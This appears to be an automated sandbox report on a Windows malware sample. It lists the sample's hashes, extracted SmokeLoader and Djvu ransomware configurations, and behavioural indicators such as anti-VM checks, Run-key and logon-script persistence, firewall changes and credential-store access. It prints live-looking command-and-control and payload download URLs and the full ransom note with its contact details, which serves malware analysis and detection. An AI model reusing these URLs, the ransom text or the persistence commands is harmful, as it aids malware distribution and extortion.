Analysis
-
max time kernel
108s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20231025-en -
resource tags
arch:x64arch:x86image:win10v2004-20231025-enlocale:en-usos:windows10-2004-x64system -
submitted
19-11-2023 15:20
Static task
static1
Behavioral task
behavioral1
Sample
1f41d3a0527983c765effac94ad197d4ae778ba512e2e66edd29c43251c6f80e.exe
Resource
win10v2004-20231025-en
General
-
Target
1f41d3a0527983c765effac94ad197d4ae778ba512e2e66edd29c43251c6f80e.exe
-
Size
257KB
-
MD5
ea6ec71918ea7f425a20a330169921b7
-
SHA1
e21b93928c42ef599584eb4fbf5d2893f55913c8
-
SHA256
1f41d3a0527983c765effac94ad197d4ae778ba512e2e66edd29c43251c6f80e
-
SHA512
523d829565b017c245ef6f1b788eb8108539310169349e9cd071533cbe5ccf0e664d43bdc7b03f9f5cc43a229d7d5edacf0942146c030b22fe440fbf47b41b07
-
SSDEEP
3072:VPiwYW0w5imXIK5dh0nzE4O+8qejrsmlnXp9QR4qMhXRBG7ovb1YDO:lz4m75dhYzmjqejwkkRVKGMa
Malware Config
Extracted
smokeloader
2022
http://onualituyrs.org/
http://sumagulituyo.org/
http://snukerukeutit.org/
http://lightseinsteniki.org/
http://liuliuoumumy.org/
http://stualialuyastrelia.net/
http://kumbuyartyty.net/
http://criogetikfenbut.org/
http://tonimiuyaytre.org/
http://tyiuiunuewqy.org/
http://dpav.cc/tmp/
http://lrproduct.ru/tmp/
http://kggcp.com/tmp/
http://talesofpirates.net/tmp/
http://pirateking.online/tmp/
http://piratia.pw/tmp/
http://go-piratia.ru/tmp/
Extracted
djvu
http://zexeq.com/lancer/get.php
-
extension
.iicc
-
offline_id
MI4io8cIlhyYsGaDxoKsbpWzfIe5lGPE0dYtrht1
-
payload_url
http://brusuax.com/dl/build2.exe
http://zexeq.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-Y6UIMfI736 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0826ASdw
Extracted
smokeloader
pub1
Extracted
smokeloader
up3
Extracted
smokeloader
2020
http://host-file-host6.com/
http://host-host-file8.com/
Signatures
-
Detected Djvu ransomware 9 IoCs
resource yara_rule behavioral1/memory/4476-594-0x0000000002310000-0x000000000242B000-memory.dmp family_djvu behavioral1/memory/4464-600-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4464-602-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4464-598-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4464-596-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4464-636-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4200-772-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4200-773-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4200-776-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Glupteba payload 8 IoCs
resource yara_rule behavioral1/memory/3408-624-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/3408-627-0x0000000002DF0000-0x00000000036DB000-memory.dmp family_glupteba behavioral1/memory/3408-628-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/3408-677-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/3408-765-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/3408-786-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/1228-797-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/3408-849-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 1912 created 3292 1912 latestX.exe 42 PID 1912 created 3292 1912 latestX.exe 42 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ F21.exe -
Blocklisted process makes network request 16 IoCs
flow pid Process 128 1812 schtasks.exe 130 1812 schtasks.exe 131 1812 schtasks.exe 134 1812 schtasks.exe 136 1812 schtasks.exe 138 1812 schtasks.exe 140 1812 schtasks.exe 141 1812 schtasks.exe 142 1812 schtasks.exe 143 1812 schtasks.exe 144 1812 schtasks.exe 145 1812 schtasks.exe 146 1812 schtasks.exe 147 1812 schtasks.exe 148 1812 schtasks.exe 149 1812 schtasks.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs 2 IoCs
pid Process 2220 netsh.exe 1476 netsh.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion F21.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion F21.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation notepad.exe Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation 4AF.exe Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation AFA.exe -
Deletes itself 1 IoCs
pid Process 3292 Explorer.EXE -
Executes dropped EXE 21 IoCs
pid Process 1812 328.exe 4476 4AF.exe 2484 AFA.exe 1128 F21.exe 1636 notepad.exe 3408 275D.exe 1928 Conhost.exe 3004 3161.exe 4464 4AF.exe 4444 4AF.exe 4472 WerFault.exe 2308 InstallSetup5.exe 4308 741A.exe 4148 Broom.exe 4456 toolspub2.exe 1228 d21cbe21e38b385a41a68c5e6dd32f4c.exe 1912 latestX.exe 4200 4AF.exe 4332 toolspub2.exe 3100 275D.exe 2600 d21cbe21e38b385a41a68c5e6dd32f4c.exe -
Loads dropped DLL 4 IoCs
pid Process 1636 notepad.exe 2128 rundll32.exe 1928 Conhost.exe 1080 regsvr32.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 2968 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Registers new Windows logon scripts automatically executed at logon. 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Environment\UserInitMprLogonScript = "rundll32 C:\\Users\\Admin\\AppData\\Local\\Microsoft\\WindowsApps\\cleanhelper.dll T34 /k rulet421 /auto" Process not Found -
resource yara_rule behavioral1/files/0x0007000000022e4b-213.dat themida behavioral1/files/0x0007000000022e4b-204.dat themida behavioral1/memory/1128-583-0x0000000000800000-0x0000000001048000-memory.dmp themida behavioral1/memory/1128-759-0x0000000000800000-0x0000000001048000-memory.dmp themida -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ebaea8d4-fb0b-4643-ad68-308d4ded9274\\4AF.exe\" --AutoStart" 4AF.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA F21.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 102 api.2ip.ua 103 api.2ip.ua -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive Conhost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log Conhost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1128 F21.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 4476 set thread context of 4464 4476 4AF.exe 110 PID 4444 set thread context of 4200 4444 4AF.exe 128 PID 4456 set thread context of 4332 4456 toolspub2.exe 133 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 275D.exe -
Launches sc.exe 12 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 536 sc.exe 1436 sc.exe 1608 sc.exe 1072 sc.exe 2188 sc.exe 436 sc.exe 976 sc.exe 2300 sc.exe 2908 sc.exe 1456 sc.exe 3116 sc.exe 1276 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 4128 4200 WerFault.exe 128 728 1812 WerFault.exe 100 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1f41d3a0527983c765effac94ad197d4ae778ba512e2e66edd29c43251c6f80e.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1f41d3a0527983c765effac94ad197d4ae778ba512e2e66edd29c43251c6f80e.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3161.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1f41d3a0527983c765effac94ad197d4ae778ba512e2e66edd29c43251c6f80e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3161.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3161.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4944 schtasks.exe 2632 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" 275D.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" 275D.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time" 275D.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" 275D.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" 275D.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" 275D.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs Conhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time" 275D.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" 275D.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates Conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" 275D.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" 275D.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2696 1f41d3a0527983c765effac94ad197d4ae778ba512e2e66edd29c43251c6f80e.exe 2696 1f41d3a0527983c765effac94ad197d4ae778ba512e2e66edd29c43251c6f80e.exe 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3292 Explorer.EXE -
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process 2696 1f41d3a0527983c765effac94ad197d4ae778ba512e2e66edd29c43251c6f80e.exe 3004 3161.exe 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 3292 Explorer.EXE 4332 toolspub2.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
description pid Process Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeDebugPrivilege 1128 F21.exe Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeSecurityPrivilege 4308 741A.exe Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeDebugPrivilege 1520 powershell.exe Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeDebugPrivilege 976 Conhost.exe Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeDebugPrivilege 3408 275D.exe Token: SeImpersonatePrivilege 3408 275D.exe Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeDebugPrivilege 1228 d21cbe21e38b385a41a68c5e6dd32f4c.exe Token: SeImpersonatePrivilege 1228 d21cbe21e38b385a41a68c5e6dd32f4c.exe Token: SeDebugPrivilege 2596 Conhost.exe Token: SeDebugPrivilege 3612 powershell.exe Token: SeDebugPrivilege 1184 powershell.exe Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1928 Conhost.exe 1636 notepad.exe 4148 Broom.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3292 wrote to memory of 1812 3292 Explorer.EXE 100 PID 3292 wrote to memory of 1812 3292 Explorer.EXE 100 PID 3292 wrote to memory of 1812 3292 Explorer.EXE 100 PID 3292 wrote to memory of 4476 3292 Explorer.EXE 101 PID 3292 wrote to memory of 4476 3292 Explorer.EXE 101 PID 3292 wrote to memory of 4476 3292 Explorer.EXE 101 PID 3292 wrote to memory of 2484 3292 Explorer.EXE 102 PID 3292 wrote to memory of 2484 3292 Explorer.EXE 102 PID 3292 wrote to memory of 2484 3292 Explorer.EXE 102 PID 3292 wrote to memory of 1128 3292 Explorer.EXE 103 PID 3292 wrote to memory of 1128 3292 Explorer.EXE 103 PID 3292 wrote to memory of 1128 3292 Explorer.EXE 103 PID 2484 wrote to memory of 1636 2484 AFA.exe 104 PID 2484 wrote to memory of 1636 2484 AFA.exe 104 PID 1636 wrote to memory of 2128 1636 notepad.exe 106 PID 1636 wrote to memory of 2128 1636 notepad.exe 106 PID 3292 wrote to memory of 3408 3292 Explorer.EXE 107 PID 3292 wrote to memory of 3408 3292 Explorer.EXE 107 PID 3292 wrote to memory of 3408 3292 Explorer.EXE 107 PID 1636 wrote to memory of 1928 1636 notepad.exe 160 PID 1636 wrote to memory of 1928 1636 notepad.exe 160 PID 3292 wrote to memory of 3004 3292 Explorer.EXE 109 PID 3292 wrote to memory of 3004 3292 Explorer.EXE 109 PID 3292 wrote to memory of 3004 3292 Explorer.EXE 109 PID 4476 wrote to memory of 4464 4476 4AF.exe 110 PID 4476 wrote to memory of 4464 4476 4AF.exe 110 PID 4476 wrote to memory of 4464 4476 4AF.exe 110 PID 4476 wrote to memory of 4464 4476 4AF.exe 110 